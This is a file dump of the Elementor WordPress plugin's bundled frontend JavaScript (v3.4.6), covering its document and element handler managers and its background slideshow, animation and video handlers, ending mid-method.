File: //proc/self/cwd/wp-content/plugins/elementor/assets/js/frontend.js
/*! elementor - v3.4.6 - 19-10-2021 */
(self["webpackChunkelementor"] = self["webpackChunkelementor"] || []).push([["frontend"],{
/***/ "../assets/dev/js/frontend/documents-manager.js":
/*!******************************************************!*\
!*** ../assets/dev/js/frontend/documents-manager.js ***!
\******************************************************/
/***/ ((__unused_webpack_module, exports, __webpack_require__) => {
"use strict";
var _interopRequireDefault = __webpack_require__(/*! @babel/runtime/helpers/interopRequireDefault */ "../node_modules/@babel/runtime/helpers/interopRequireDefault.js");
Object.defineProperty(exports, "__esModule", ({
value: true
}));
exports.default = void 0;
var _document = _interopRequireDefault(__webpack_require__(/*! ./document */ "../assets/dev/js/frontend/document.js"));
class _default extends elementorModules.ViewModule {
constructor(...args) {
super(...args);
this.documents = {};
this.initDocumentClasses();
this.attachDocumentsClasses();
}
getDefaultSettings() {
return {
selectors: {
document: '.elementor'
}
};
}
getDefaultElements() {
const selectors = this.getSettings('selectors');
return {
$documents: jQuery(selectors.document)
};
}
initDocumentClasses() {
this.documentClasses = {
base: _document.default
};
elementorFrontend.hooks.doAction('elementor/frontend/documents-manager/init-classes', this);
}
addDocumentClass(documentType, documentClass) {
this.documentClasses[documentType] = documentClass;
}
attachDocumentsClasses() {
this.elements.$documents.each((index, document) => this.attachDocumentClass(jQuery(document)));
}
attachDocumentClass($document) {
const documentData = $document.data(),
documentID = documentData.elementorId,
documentType = documentData.elementorType,
DocumentClass = this.documentClasses[documentType] || this.documentClasses.base;
this.documents[documentID] = new DocumentClass({
$element: $document,
id: documentID
});
}
}
exports.default = _default;
/***/ }),
/***/ "../assets/dev/js/frontend/elements-handlers-manager.js":
/*!**************************************************************!*\
!*** ../assets/dev/js/frontend/elements-handlers-manager.js ***!
\**************************************************************/
/***/ ((module, __unused_webpack_exports, __webpack_require__) => {
"use strict";
var _interopRequireDefault = __webpack_require__(/*! @babel/runtime/helpers/interopRequireDefault */ "../node_modules/@babel/runtime/helpers/interopRequireDefault.js");
var _global = _interopRequireDefault(__webpack_require__(/*! ./handlers/global */ "../assets/dev/js/frontend/handlers/global.js"));
var _section = _interopRequireDefault(__webpack_require__(/*! ./handlers/section/section */ "../assets/dev/js/frontend/handlers/section/section.js"));
var _column = _interopRequireDefault(__webpack_require__(/*! ./handlers/column */ "../assets/dev/js/frontend/handlers/column.js"));
module.exports = function ($) {
const handlersInstances = {};
this.elementsHandlers = {
'accordion.default': () => __webpack_require__.e(/*! import() | accordion */ "accordion").then(__webpack_require__.bind(__webpack_require__, /*! ./handlers/accordion */ "../assets/dev/js/frontend/handlers/accordion.js")),
'alert.default': () => __webpack_require__.e(/*! import() | alert */ "alert").then(__webpack_require__.bind(__webpack_require__, /*! ./handlers/alert */ "../assets/dev/js/frontend/handlers/alert.js")),
'counter.default': () => __webpack_require__.e(/*! import() | counter */ "counter").then(__webpack_require__.bind(__webpack_require__, /*! ./handlers/counter */ "../assets/dev/js/frontend/handlers/counter.js")),
'progress.default': () => __webpack_require__.e(/*! import() | progress */ "progress").then(__webpack_require__.bind(__webpack_require__, /*! ./handlers/progress */ "../assets/dev/js/frontend/handlers/progress.js")),
'tabs.default': () => __webpack_require__.e(/*! import() | tabs */ "tabs").then(__webpack_require__.bind(__webpack_require__, /*! ./handlers/tabs */ "../assets/dev/js/frontend/handlers/tabs.js")),
'toggle.default': () => __webpack_require__.e(/*! import() | toggle */ "toggle").then(__webpack_require__.bind(__webpack_require__, /*! ./handlers/toggle */ "../assets/dev/js/frontend/handlers/toggle.js")),
'video.default': () => __webpack_require__.e(/*! import() | video */ "video").then(__webpack_require__.bind(__webpack_require__, /*! ./handlers/video */ "../assets/dev/js/frontend/handlers/video.js")),
'image-carousel.default': () => __webpack_require__.e(/*! import() | image-carousel */ "image-carousel").then(__webpack_require__.bind(__webpack_require__, /*! ./handlers/image-carousel */ "../assets/dev/js/frontend/handlers/image-carousel.js")),
'text-editor.default': () => __webpack_require__.e(/*! import() | text-editor */ "text-editor").then(__webpack_require__.bind(__webpack_require__, /*! ./handlers/text-editor */ "../assets/dev/js/frontend/handlers/text-editor.js")),
'wp-widget-media_audio.default': () => __webpack_require__.e(/*! import() | wp-audio */ "wp-audio").then(__webpack_require__.bind(__webpack_require__, /*! ./handlers/wp-audio */ "../assets/dev/js/frontend/handlers/wp-audio.js"))
};
const addGlobalHandlers = () => elementorFrontend.hooks.addAction('frontend/element_ready/global', _global.default);
const addElementsHandlers = () => {
this.elementsHandlers.section = _section.default;
this.elementsHandlers.column = _column.default;
$.each(this.elementsHandlers, (elementName, Handlers) => {
const elementData = elementName.split('.');
elementName = elementData[0];
const skin = elementData[1] || null;
this.attachHandler(elementName, Handlers, skin);
});
};
const isClassHandler = Handler => {
var _Handler$prototype;
return (_Handler$prototype = Handler.prototype) === null || _Handler$prototype === void 0 ? void 0 : _Handler$prototype.getUniqueHandlerID;
};
const addHandlerWithHook = (elementName, Handler, skin = 'default') => {
skin = skin ? '.' + skin : '';
elementorFrontend.hooks.addAction(`frontend/element_ready/${elementName}${skin}`, $element => {
if (isClassHandler(Handler)) {
this.addHandler(Handler, {
$element
}, true);
} else {
const handlerValue = Handler();
if (handlerValue instanceof Promise) {
handlerValue.then(({
default: dynamicHandler
}) => {
this.addHandler(dynamicHandler, {
$element
}, true);
});
} else {
this.addHandler(handlerValue, {
$element
}, true);
}
}
});
};
this.addHandler = function (HandlerClass, options) {
const elementID = options.$element.data('model-cid');
let handlerID; // If element is in edit mode
if (elementID) {
handlerID = HandlerClass.prototype.getConstructorID();
if (!handlersInstances[elementID]) {
handlersInstances[elementID] = {};
}
const oldHandler = handlersInstances[elementID][handlerID];
if (oldHandler) {
oldHandler.onDestroy();
}
}
const newHandler = new HandlerClass(options);
if (elementID) {
handlersInstances[elementID][handlerID] = newHandler;
}
};
this.attachHandler = (elementName, Handlers, skin) => {
if (!Array.isArray(Handlers)) {
Handlers = [Handlers];
}
Handlers.forEach(Handler => addHandlerWithHook(elementName, Handler, skin));
};
this.getHandler = function (handlerName) {
if (!handlerName) {
return;
}
const elementHandler = this.elementsHandlers[handlerName];
if (isClassHandler(elementHandler)) {
return elementHandler;
}
return new Promise(res => {
elementHandler().then(({
default: dynamicHandler
}) => {
res(dynamicHandler);
});
});
};
this.getHandlers = function (handlerName) {
elementorCommon.helpers.softDeprecated('getHandlers', '3.1.0', 'elementorFrontend.elementsHandler.getHandler');
if (handlerName) {
return this.getHandler(handlerName);
}
return this.elementsHandlers;
};
this.runReadyTrigger = function (scope) {
if (elementorFrontend.config.is_static) {
return;
} // Initializing the `$scope` as frontend jQuery instance
const $scope = jQuery(scope),
elementType = $scope.attr('data-element_type');
if (!elementType) {
return;
}
elementorFrontend.hooks.doAction('frontend/element_ready/global', $scope, $);
elementorFrontend.hooks.doAction(`frontend/element_ready/${elementType}`, $scope, $);
if ('widget' === elementType) {
const widgetType = $scope.attr('data-widget_type');
elementorFrontend.hooks.doAction(`frontend/element_ready/${widgetType}`, $scope, $);
}
};
this.init = () => {
addGlobalHandlers();
addElementsHandlers();
};
};
/***/ }),
/***/ "../assets/dev/js/frontend/frontend.js":
/*!*********************************************!*\
!*** ../assets/dev/js/frontend/frontend.js ***!
\*********************************************/
/***/ ((__unused_webpack_module, exports, __webpack_require__) => {
"use strict";
var _interopRequireDefault = __webpack_require__(/*! @babel/runtime/helpers/interopRequireDefault */ "../node_modules/@babel/runtime/helpers/interopRequireDefault.js");
Object.defineProperty(exports, "__esModule", ({
value: true
}));
exports.default = void 0;
__webpack_require__(/*! ../public-path */ "../assets/dev/js/public-path.js");
var _documentsManager = _interopRequireDefault(__webpack_require__(/*! ./documents-manager */ "../assets/dev/js/frontend/documents-manager.js"));
var _storage = _interopRequireDefault(__webpack_require__(/*! elementor-common/utils/storage */ "../core/common/assets/js/utils/storage.js"));
var _environment = _interopRequireDefault(__webpack_require__(/*! elementor-common/utils/environment */ "../core/common/assets/js/utils/environment.js"));
var _youtubeLoader = _interopRequireDefault(__webpack_require__(/*! ./utils/video-api/youtube-loader */ "../assets/dev/js/frontend/utils/video-api/youtube-loader.js"));
var _vimeoLoader = _interopRequireDefault(__webpack_require__(/*! ./utils/video-api/vimeo-loader */ "../assets/dev/js/frontend/utils/video-api/vimeo-loader.js"));
var _baseLoader = _interopRequireDefault(__webpack_require__(/*! ./utils/video-api/base-loader */ "../assets/dev/js/frontend/utils/video-api/base-loader.js"));
var _urlActions = _interopRequireDefault(__webpack_require__(/*! ./utils/url-actions */ "../assets/dev/js/frontend/utils/url-actions.js"));
var _swiperBc = _interopRequireDefault(__webpack_require__(/*! ./utils/swiper-bc */ "../assets/dev/js/frontend/utils/swiper-bc.js"));
var _lightboxManager = _interopRequireDefault(__webpack_require__(/*! ./utils/lightbox/lightbox-manager */ "../assets/dev/js/frontend/utils/lightbox/lightbox-manager.js"));
var _assetsLoader = _interopRequireDefault(__webpack_require__(/*! ./utils/assets-loader */ "../assets/dev/js/frontend/utils/assets-loader.js"));
var _breakpoints = _interopRequireDefault(__webpack_require__(/*! elementor-utils/breakpoints */ "../assets/dev/js/utils/breakpoints.js"));
var _frontend = _interopRequireDefault(__webpack_require__(/*! elementor/modules/shapes/assets/js/frontend/frontend */ "../modules/shapes/assets/js/frontend/frontend.js"));
var _utils = __webpack_require__(/*! elementor-frontend/utils/utils */ "../assets/dev/js/frontend/utils/utils.js");
/* global elementorFrontendConfig */
const EventManager = __webpack_require__(/*! elementor-utils/hooks */ "../assets/dev/js/utils/hooks.js"),
ElementsHandler = __webpack_require__(/*! elementor-frontend/elements-handlers-manager */ "../assets/dev/js/frontend/elements-handlers-manager.js"),
AnchorsModule = __webpack_require__(/*! elementor-frontend/utils/anchors */ "../assets/dev/js/frontend/utils/anchors.js");
class Frontend extends elementorModules.ViewModule {
constructor(...args) {
super(...args);
this.config = elementorFrontendConfig;
this.config.legacyMode = {
get elementWrappers() {
if (elementorFrontend.isEditMode()) {
elementorCommon.helpers.hardDeprecated('elementorFrontend.config.legacyMode.elementWrappers', '3.1.0', 'elementorFrontend.config.experimentalFeatures.e_dom_optimization');
}
return !elementorFrontend.config.experimentalFeatures.e_dom_optimization;
}
};
this.populateActiveBreakpointsConfig();
} // TODO: BC since 2.5.0
get Module() {
if (this.isEditMode()) {
parent.elementorCommon.helpers.hardDeprecated('elementorFrontend.Module', '2.5.0', 'elementorModules.frontend.handlers.Base');
}
return elementorModules.frontend.handlers.Base;
}
getDefaultSettings() {
return {
selectors: {
elementor: '.elementor',
adminBar: '#wpadminbar'
}
};
}
getDefaultElements() {
const defaultElements = {
window: window,
$window: jQuery(window),
$document: jQuery(document),
$head: jQuery(document.head),
$body: jQuery(document.body),
$deviceMode: jQuery('<span>', {
id: 'elementor-device-mode',
class: 'elementor-screen-only'
})
};
defaultElements.$body.append(defaultElements.$deviceMode);
return defaultElements;
}
bindEvents() {
this.elements.$window.on('resize', () => this.setDeviceModeData());
}
/**
* @deprecated 2.4.0 Use just `this.elements` instead
*/
getElements(elementName) {
return this.getItems(this.elements, elementName);
}
/**
* @deprecated 2.4.0 This method was never in use
*/
getPageSettings(settingName) {
const settingsObject = this.isEditMode() ? elementor.settings.page.model.attributes : this.config.settings.page;
return this.getItems(settingsObject, settingName);
}
getGeneralSettings(settingName) {
if (this.isEditMode()) {
parent.elementorCommon.helpers.softDeprecated('getGeneralSettings', '3.0.0', 'getKitSettings and remove the `elementor_` prefix');
}
return this.getKitSettings(`elementor_${settingName}`);
}
getKitSettings(settingName) {
// TODO: use Data API.
return this.getItems(this.config.kit, settingName);
}
getCurrentDeviceMode() {
return getComputedStyle(this.elements.$deviceMode[0], ':after').content.replace(/"/g, '');
}
getDeviceSetting(deviceMode, settings, settingKey) {
// Add specific handling for widescreen since it is larger than desktop.
if ('widescreen' === deviceMode) {
return this.getWidescreenSetting(settings, settingKey);
}
const devices = elementorFrontend.breakpoints.getActiveBreakpointsList({
largeToSmall: true,
withDesktop: true
});
let deviceIndex = devices.indexOf(deviceMode);
while (deviceIndex > 0) {
const currentDevice = devices[deviceIndex],
fullSettingKey = settingKey + '_' + currentDevice,
deviceValue = settings[fullSettingKey]; // Accept 0 as value.
if (deviceValue || 0 === deviceValue) {
return deviceValue;
}
deviceIndex--;
}
return settings[settingKey];
}
getWidescreenSetting(settings, settingKey) {
const deviceMode = 'widescreen',
widescreenSettingKey = settingKey + '_' + deviceMode;
let settingToReturn; // If the device mode is 'widescreen', and the setting exists - return it.
if (settings[widescreenSettingKey]) {
settingToReturn = settings[widescreenSettingKey];
} else {
// Otherwise, return the desktop setting
settingToReturn = settings[settingKey];
}
return settingToReturn;
}
getCurrentDeviceSetting(settings, settingKey) {
return this.getDeviceSetting(elementorFrontend.getCurrentDeviceMode(), settings, settingKey);
}
isEditMode() {
return this.config.environmentMode.edit;
}
isWPPreviewMode() {
return this.config.environmentMode.wpPreview;
}
initDialogsManager() {
let dialogsManager;
this.getDialogsManager = () => {
if (!dialogsManager) {
dialogsManager = new DialogsManager.Instance();
}
return dialogsManager;
};
}
initOnReadyComponents() {
this.utils = {
youtube: new _youtubeLoader.default(),
vimeo: new _vimeoLoader.default(),
baseVideoLoader: new _baseLoader.default(),
anchors: new AnchorsModule(),
get lightbox() {
return _lightboxManager.default.getLightbox();
},
urlActions: new _urlActions.default(),
swiper: _swiperBc.default,
environment: _environment.default,
assetsLoader: new _assetsLoader.default(),
escapeHTML: _utils.escapeHTML
}; // TODO: BC since 2.4.0
this.modules = {
StretchElement: elementorModules.frontend.tools.StretchElement,
Masonry: elementorModules.utils.Masonry
};
this.elementsHandler.init();
if (this.isEditMode()) {
elementor.once('document:loaded', () => this.onDocumentLoaded());
} else {
this.onDocumentLoaded();
}
}
initOnReadyElements() {
this.elements.$wpAdminBar = this.elements.$document.find(this.getSettings('selectors.adminBar'));
}
addUserAgentClasses() {
for (const [key, value] of Object.entries(_environment.default)) {
if (value) {
this.elements.$body.addClass('e--ua-' + key);
}
}
}
setDeviceModeData() {
this.elements.$body.attr('data-elementor-device-mode', this.getCurrentDeviceMode());
}
addListenerOnce(listenerID, event, callback, to) {
if (!to) {
to = this.elements.$window;
}
if (!this.isEditMode()) {
to.on(event, callback);
return;
}
this.removeListeners(listenerID, event, to);
if (to instanceof jQuery) {
const eventNS = event + '.' + listenerID;
to.on(eventNS, callback);
} else {
to.on(event, callback, listenerID);
}
}
removeListeners(listenerID, event, callback, from) {
if (!from) {
from = this.elements.$window;
}
if (from instanceof jQuery) {
const eventNS = event + '.' + listenerID;
from.off(eventNS, callback);
} else {
from.off(event, callback, listenerID);
}
} // Based on underscore function
debounce(func, wait) {
let timeout;
return function () {
const context = this,
args = arguments;
const later = () => {
timeout = null;
func.apply(context, args);
};
const callNow = !timeout;
clearTimeout(timeout);
timeout = setTimeout(later, wait);
if (callNow) {
func.apply(context, args);
}
};
}
waypoint($element, callback, options) {
const defaultOptions = {
offset: '100%',
triggerOnce: true
};
options = jQuery.extend(defaultOptions, options);
const correctCallback = function () {
const element = this.element || this,
result = callback.apply(element, arguments); // If is Waypoint new API and is frontend
if (options.triggerOnce && this.destroy) {
this.destroy();
}
return result;
};
return $element.elementorWaypoint(correctCallback, options);
}
muteMigrationTraces() {
jQuery.migrateMute = true;
jQuery.migrateTrace = false;
}
/**
* Initialize the modules' widgets handlers.
*/
initModules() {
const handlers = {
shapes: _frontend.default
};
elementorFrontend.trigger('elementor/modules/init:before');
Object.entries(handlers).forEach(([moduleName, ModuleClass]) => {
this.modulesHandlers[moduleName] = new ModuleClass();
});
}
populateActiveBreakpointsConfig() {
this.config.responsive.activeBreakpoints = {};
Object.entries(this.config.responsive.breakpoints).forEach(([breakpointKey, breakpointData]) => {
if (breakpointData.is_enabled) {
this.config.responsive.activeBreakpoints[breakpointKey] = breakpointData;
}
});
}
init() {
this.hooks = new EventManager();
this.breakpoints = new _breakpoints.default(this.config.responsive);
this.storage = new _storage.default();
this.elementsHandler = new ElementsHandler(jQuery);
this.modulesHandlers = {};
this.addUserAgentClasses();
this.setDeviceModeData();
this.initDialogsManager();
if (this.isEditMode()) {
this.muteMigrationTraces();
} // Keep this line before `initOnReadyComponents` call
this.elements.$window.trigger('elementor/frontend/init');
this.initModules();
this.initOnReadyElements();
this.initOnReadyComponents();
}
onDocumentLoaded() {
this.documentsManager = new _documentsManager.default();
this.trigger('components:init');
new _lightboxManager.default();
}
}
exports.default = Frontend;
window.elementorFrontend = new Frontend();
if (!elementorFrontend.isEditMode()) {
jQuery(() => elementorFrontend.init());
}
/***/ }),
/***/ "../assets/dev/js/frontend/handlers/background-slideshow.js":
/*!******************************************************************!*\
!*** ../assets/dev/js/frontend/handlers/background-slideshow.js ***!
\******************************************************************/
/***/ ((__unused_webpack_module, exports) => {
"use strict";
Object.defineProperty(exports, "__esModule", ({
value: true
}));
exports.default = void 0;
class BackgroundSlideshow extends elementorModules.frontend.handlers.SwiperBase {
getDefaultSettings() {
return {
classes: {
swiperContainer: 'elementor-background-slideshow swiper-container',
swiperWrapper: 'swiper-wrapper',
swiperSlide: 'elementor-background-slideshow__slide swiper-slide',
slideBackground: 'elementor-background-slideshow__slide__image',
kenBurns: 'elementor-ken-burns',
kenBurnsActive: 'elementor-ken-burns--active',
kenBurnsIn: 'elementor-ken-burns--in',
kenBurnsOut: 'elementor-ken-burns--out'
}
};
}
getSwiperOptions() {
const elementSettings = this.getElementSettings();
const swiperOptions = {
grabCursor: false,
slidesPerView: 1,
slidesPerGroup: 1,
loop: 'yes' === elementSettings.background_slideshow_loop,
speed: elementSettings.background_slideshow_transition_duration,
autoplay: {
delay: elementSettings.background_slideshow_slide_duration,
stopOnLastSlide: !elementSettings.background_slideshow_loop
},
handleElementorBreakpoints: true,
on: {
slideChange: () => {
if (elementSettings.background_slideshow_ken_burns) {
this.handleKenBurns();
}
}
}
};
if ('yes' === elementSettings.background_slideshow_loop) {
swiperOptions.loopedSlides = this.getSlidesCount();
}
switch (elementSettings.background_slideshow_slide_transition) {
case 'fade':
swiperOptions.effect = 'fade';
swiperOptions.fadeEffect = {
crossFade: true
};
break;
case 'slide_down':
swiperOptions.autoplay.reverseDirection = true;
case 'slide_up':
swiperOptions.direction = 'vertical';
break;
}
return swiperOptions;
}
buildSwiperElements() {
const classes = this.getSettings('classes'),
elementSettings = this.getElementSettings(),
direction = 'slide_left' === elementSettings.background_slideshow_slide_transition ? 'ltr' : 'rtl',
$container = jQuery('<div>', {
class: classes.swiperContainer,
dir: direction
}),
$wrapper = jQuery('<div>', {
class: classes.swiperWrapper
}),
kenBurnsActive = elementSettings.background_slideshow_ken_burns;
let slideInnerClass = classes.slideBackground;
if (kenBurnsActive) {
slideInnerClass += ' ' + classes.kenBurns;
const kenBurnsDirection = 'in' === elementSettings.background_slideshow_ken_burns_zoom_direction ? 'kenBurnsIn' : 'kenBurnsOut';
slideInnerClass += ' ' + classes[kenBurnsDirection];
}
this.elements.$slides = jQuery();
elementSettings.background_slideshow_gallery.forEach(slide => {
const $slide = jQuery('<div>', {
class: classes.swiperSlide
}),
$slidebg = jQuery('<div>', {
class: slideInnerClass,
style: 'background-image: url("' + slide.url + '");'
});
$slide.append($slidebg);
$wrapper.append($slide);
this.elements.$slides = this.elements.$slides.add($slide);
});
$container.append($wrapper);
this.$element.prepend($container);
this.elements.$backgroundSlideShowContainer = $container;
}
async initSlider() {
if (1 >= this.getSlidesCount()) {
return;
}
const elementSettings = this.getElementSettings();
const Swiper = elementorFrontend.utils.swiper;
this.swiper = await new Swiper(this.elements.$backgroundSlideShowContainer, this.getSwiperOptions()); // Expose the swiper instance in the frontend
this.elements.$backgroundSlideShowContainer.data('swiper', this.swiper);
if (elementSettings.background_slideshow_ken_burns) {
this.handleKenBurns();
}
}
activate() {
this.buildSwiperElements();
this.initSlider();
}
deactivate() {
if (this.swiper) {
this.swiper.destroy();
this.elements.$backgroundSlideShowContainer.remove();
}
}
run() {
if ('slideshow' === this.getElementSettings('background_background')) {
this.activate();
} else {
this.deactivate();
}
}
onInit() {
super.onInit();
if (this.getElementSettings('background_slideshow_gallery')) {
this.run();
}
}
onDestroy() {
super.onDestroy();
this.deactivate();
}
onElementChange(propertyName) {
if ('background_background' === propertyName) {
this.run();
}
}
}
exports.default = BackgroundSlideshow;
/***/ }),
/***/ "../assets/dev/js/frontend/handlers/column.js":
/*!****************************************************!*\
!*** ../assets/dev/js/frontend/handlers/column.js ***!
\****************************************************/
/***/ ((__unused_webpack_module, exports, __webpack_require__) => {
"use strict";
var _interopRequireDefault = __webpack_require__(/*! @babel/runtime/helpers/interopRequireDefault */ "../node_modules/@babel/runtime/helpers/interopRequireDefault.js");
Object.defineProperty(exports, "__esModule", ({
value: true
}));
exports.default = void 0;
var _backgroundSlideshow = _interopRequireDefault(__webpack_require__(/*! ./background-slideshow */ "../assets/dev/js/frontend/handlers/background-slideshow.js"));
var _default = [_backgroundSlideshow.default];
exports.default = _default;
/***/ }),
/***/ "../assets/dev/js/frontend/handlers/global.js":
/*!****************************************************!*\
!*** ../assets/dev/js/frontend/handlers/global.js ***!
\****************************************************/
/***/ ((__unused_webpack_module, exports) => {
"use strict";
Object.defineProperty(exports, "__esModule", ({
value: true
}));
exports.default = void 0;
class GlobalHandler extends elementorModules.frontend.handlers.Base {
getWidgetType() {
return 'global';
}
animate() {
const $element = this.$element,
animation = this.getAnimation();
if ('none' === animation) {
$element.removeClass('elementor-invisible');
return;
}
const elementSettings = this.getElementSettings(),
animationDelay = elementSettings._animation_delay || elementSettings.animation_delay || 0;
$element.removeClass(animation);
if (this.currentAnimation) {
$element.removeClass(this.currentAnimation);
}
this.currentAnimation = animation;
setTimeout(() => {
$element.removeClass('elementor-invisible').addClass('animated ' + animation);
}, animationDelay);
}
getAnimation() {
return this.getCurrentDeviceSetting('animation') || this.getCurrentDeviceSetting('_animation');
}
onInit(...args) {
super.onInit(...args);
if (this.getAnimation()) {
const observer = elementorModules.utils.Scroll.scrollObserver({
callback: event => {
if (event.isInViewport) {
this.animate();
observer.unobserve(this.$element[0]);
}
}
});
observer.observe(this.$element[0]);
}
}
onElementChange(propertyName) {
if (/^_?animation/.test(propertyName)) {
this.animate();
}
}
}
var _default = $scope => {
elementorFrontend.elementsHandler.addHandler(GlobalHandler, {
$element: $scope
});
};
exports.default = _default;
/***/ }),
/***/ "../assets/dev/js/frontend/handlers/section/background-video.js":
/*!**********************************************************************!*\
!*** ../assets/dev/js/frontend/handlers/section/background-video.js ***!
\**********************************************************************/
/***/ ((__unused_webpack_module, exports) => {
"use strict";
Object.defineProperty(exports, "__esModule", ({
value: true
}));
exports.default = void 0;
class BackgroundVideo extends elementorModules.frontend.handlers.Base {
getDefaultSettings() {
return {
selectors: {
backgroundVideoContainer: '.elementor-background-video-container',
backgroundVideoEmbed: '.elementor-background-video-embed',
backgroundVideoHosted: '.elementor-background-video-hosted'
}
};
}
getDefaultElements() {
const selectors = this.getSettings('selectors'),
elements = {
$backgroundVideoContainer: this.$element.find(selectors.backgroundVideoContainer)
};
elements.$backgroundVideoEmbed = elements.$backgroundVideoContainer.children(selectors.backgroundVideoEmbed);
elements.$backgroundVideoHosted = elements.$backgroundVideoContainer.children(selectors.backgroundVideoHosted);
return elements;
}
calcVideosSize($video) {
let aspectRatioSetting = '16:9';
if ('vimeo' === this.videoType) {
aspectRatioSetting = $video[0].width + ':' + $video[0].height;
}
const containerWidth = this.elements.$backgroundVideoContainer.outerWidth(),
containerHeight = this.elements.$backgroundVideoContainer.outerHeight(),
aspectRatioArray = aspectRatioSetting.split(':'),
aspectRatio = aspectRatioArray[0] / aspectRatioArray[1],
ratioWidth = containerWidth / aspectRatio,
ratioHeight = containerHeight * aspectRatio,
isWidthFixed = containerWidth / containerHeight > aspectRatio;
return {
width: isWidthFixed ? containerWidth : ratioHeight,
height: isWidthFixed ? ratioWidth : containerHeight
};
}
changeVideoSize() {
if (!('hosted' === this.videoType) && !this.player) {
return;
}
let $video;
if ('youtube' === this.videoType) {
$video = jQuery(this.player.getIframe());
} else if ('vimeo' === this.videoType) {
$video = jQuery(this.player.element);
} else if ('hosted' === this.videoType) {
$video = this.elements.$backgroundVideoHosted;
}
if (!$video) {
return;
}
const size = this.calcVideosSize($video);
$video.width(size.width).height(size.height);
}
startVideoLoop(firstTime) {
// If the section has been removed
if (!this.player.getIframe().contentWindow) {
return;
}
const elementSettings = this.getElementSettings(),
startPoint = elementSettings.background_video_start || 0,
endPoint = elementSettings.background_video_end;
if (elementSettings.background_play_once && !firstTime) {
this.player.stopVideo();
return;
}
this.player.seekTo(startPoint);
if (endPoint) {
const durationToEnd = endPoint - startPoint + 1;
setTimeout(() => {
this.startVideoLoop(false);
}, durationToEnd * 1000);
}
}
prepareVimeoVideo(Vimeo, videoId) {
const elementSettings = this.getElementSettings(),
startTime = elementSettings.background_video_start ? elementSettings.background_video_start : 0,
videoSize = this.elements.$backgroundVideoContainer.outerWidth(),
vimeoOptions = {
id: videoId,
width: videoSize.width,
autoplay: true,
loop: !elementSettings.background_play_once,
transparent: false,
background: true,
muted: true
};
this.player = new Vimeo.Player(this.elements.$backgroundVideoContainer, vimeoOptions); // Handle user-defined start/end times
this.handleVimeoStartEndTimes(elementSettings);
this.player.ready().then(() => {
jQuery(this.player.element).addClass('elementor-background-video-embed');
this.changeVideoSize();
});
}
handleVimeoStartEndTimes(elementSettings) {
// If a start time is defined, set the start time
if (elementSettings.background_video_start) {
this.player.on('play', data => {
if (0 === data.seconds) {
this.player.setCurrentTime(elementSettings.background_video_start);
}
});
}
this.player.on('timeupdate', data => {
// If an end time is defined, handle ending the video
if (elementSettings.background_video_end && elementSettings.background_video_end < data.seconds) {
if (elementSettings.background_play_once) {
// Stop at user-defined end time if not loop
this.player.pause();
} else {
// Go to start time if loop
this.player.setCurrentTime(elementSettings.background_video_start);
}
} // If start time is defined but an end time is not, go to user-defined start time at video end.
// Vimeo JS API has an 'ended' event, but it never fires when infinite loop is defined, so we
// get the video duration (returns a promise) then use duration-0.5s as end time
this.player.getDuration().then(duration => {
if (elementSettings.background_video_start && !elementSettings.background_video_end && data.seconds > duration - 0.5) {
this.player.setCurrentTime(elementSettings.background_video_start);
}
});
});
}
prepareYTVideo(YT, videoID) {
const $backgroundVideoContainer = this.elements.$backgroundVideoContainer,
elementSettings = this.getElementSettings();
let startStateCode = YT.PlayerState.PLAYING; // Since version 67, Chrome doesn't fire the `PLAYING` state at start time
if (window.chrome) {
startStateCode = YT.PlayerState.UNSTARTED;
}
const playerOptions = {
videoId: videoID,
events: {
onReady: () => {
this.player.mute();
this.changeVideoSize();
this.startVideoLoop(true);
this.player.playVideo();
},
onStateChange: event => {
switch (event.data) {
case startStateCode:
$backgroundVideoContainer.removeClass('elementor-invisible elementor-loading');
break;
case YT.PlayerState.ENDED:
this.player.seekTo(elementSettings.background_video_start || 0);
if (elementSettings.background_play_once) {
this.player.destroy();
}
}
}
},
playerVars: {
controls: 0,
rel: 0,
playsinline: 1
}
}; // To handle CORS issues, when the default host is changed, the origin parameter has to be set.
if (elementSettings.background_privacy_mode) {
playerOptions.host = 'https://www.youtube-nocookie.com';
playerOptions.origin = window.location.hostname;
}
$backgroundVideoContainer.addClass('elementor-loading elementor-invisible');
this.player = new YT.Player(this.elements.$backgroundVideoEmbed[0], playerOptions);
}
activate() {
let videoLink = this.getElementSettings('background_video_link'),
videoID;
const playOnce = this.getElementSettings('background_play_once');
if (-1 !== videoLink.indexOf('vimeo.com')) {
this.videoType = 'vimeo';
this.apiProvider = elementorFrontend.utils.vimeo;
} else if (videoLink.match(/^(?:https?:\/\/)?(?:www\.)?(?:m\.)?(?:youtu\.be\/|youtube\.com)/)) {
this.videoType = 'youtube';
this.apiProvider = elementorFrontend.utils.youtube;
}
if (this.apiProvider) {
videoID = this.apiProvider.getVideoIDFromURL(videoLink);
this.apiProvider.onApiReady(apiObject => {
if ('youtube' === this.videoType) {
this.prepareYTVideo(apiObject, videoID);
}
if ('vimeo' === this.videoType) {
this.prepareVimeoVideo(apiObject, videoID);
}
});
} else {
this.videoType = 'hosted';
const startTime = this.getElementSettings('background_video_start'),
endTime = this.getElementSettings('background_video_end');
if (startTime || endTime) {
videoLink += '#t=' + (startTime || 0) + (endTime ? ',' + endTime : '');
}
this.elements.$backgroundVideoHosted.attr('src', videoLink).one('canplay', this.changeVideoSize.bind(this));
if (playOnce) {
this.elements.$backgroundVideoHosted.on('ended', () => {
this.elements.$backgroundVideoHosted.hide();
});
}
}
elementorFrontend.elements.$window.on('resize', this.changeVideoSize);
}
deactivate() {
if ('youtube' === this.videoType && this.player.getIframe() || 'vimeo' === this.videoType) {
this.player.destroy();
} else {
this.elements.$backgroundVideoHosted.removeAttr('src').off('ended');
}
elementorFrontend.elements.$window.off('resize', this.changeVideoSize);
}
run() {
const elementSettings = this.getElementSettings();
if (!elementSettings.background_play_on_mobile && 'mobile' === elementorFrontend.getCurrentDeviceMode()) {
return;
}
if ('video' === elementSettings.background_background && elementSettings.background_video_link) {
this.activate();
} else {
this.deactivate();
}
}
onInit(...args) {
super.onInit(...args);
this.changeVideoSize = this.changeVideoSize.bind(this);
this.run();
}
onElementChange(propertyName) {
if ('background_background' === propertyName) {
this.run();
}
}
}
exports.default = BackgroundVideo;
/***/ }),
/***/ "../assets/dev/js/frontend/handlers/section/handles-position.js":
/*!**********************************************************************!*\
!*** ../assets/dev/js/frontend/handlers/section/handles-position.js ***!
\**********************************************************************/
/***/ ((__unused_webpack_module, exports) => {
"use strict";
Object.defineProperty(exports, "__esModule", ({
value: true
}));
exports.default = void 0;
class HandlesPosition extends elementorModules.frontend.handlers.Base {
isActive() {
return elementorFrontend.isEditMode();
}
isFirstSection() {
